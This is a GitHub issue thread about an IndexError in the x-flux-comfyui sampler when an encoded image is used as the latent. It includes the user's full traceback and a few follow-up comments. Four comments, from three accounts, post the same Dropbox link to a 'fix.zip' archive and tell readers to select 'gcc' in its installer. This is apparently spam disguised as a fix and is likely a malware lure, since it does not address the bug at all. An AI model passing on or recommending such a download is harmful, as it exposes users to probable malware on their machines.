### ISSUE TITLE
if encode a image to be the latent of the ksampler, reports:" !!! Exception during processing !!! list index out of range"

### ISSUE THREAD

**Issue by metsweet999** [XLabs-AI/x-flux-comfyui#88]
the workflow that can generate this error:
[Untitled222.json](https://github.com/user-attachments/files/16742643/Untitled222.json)

console info:
"
 !!! Exception during processing !!! list index out of range
 

 Traceback (most recent call last):
File "E:\ComfyUI_Mini-1\ComfyUI\execution.py", line 317, in execute
output_data, output_ui, has_subgraph = get_output_data(obj, input_data_all, execution_block_cb=execution_block_cb, pre_execute_cb=pre_execute_cb)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "E:\ComfyUI_Mini-1\ComfyUI\execution.py", line 192, in get_output_data
return_values = _map_node_over_list(obj, input_data_all, obj.FUNCTION, allow_interrupt=True, execution_block_cb=execution_block_cb, pre_execute_cb=pre_execute_cb)
 

 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "E:\ComfyUI_Mini-1\ComfyUI\execution.py", line 169, in _map_node_over_list
process_inputs(input_dict, i)
File "E:\ComfyUI_Mini-1\ComfyUI\execution.py", line 158, in process_inputs
results.append(getattr(obj, func)(**inputs))
^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "E:\ComfyUI_Mini-1\ComfyUI\custom_nodes\x-flux-comfyui\nodes.py", line 352, in sampling
x = denoise(
^^^^^^^^
File "E:\ComfyUI_Mini-1\ComfyUI\custom_nodes\x-flux-comfyui\sampling.py", line 178, in denoise
t = timesteps[t_idx]
~~~~~~~~~^^^^^^^
IndexError: list index out of range
 

 Prompt executed in 14.96 seconds
 "

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by metsweet999** [comment]
and also, seemed "setLatentNoiseMask" node not supported by the ksamper

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by PancakeAwesome** [comment]
how to fix it?

**Comment by 807502278** [comment]
I also encountered this problem
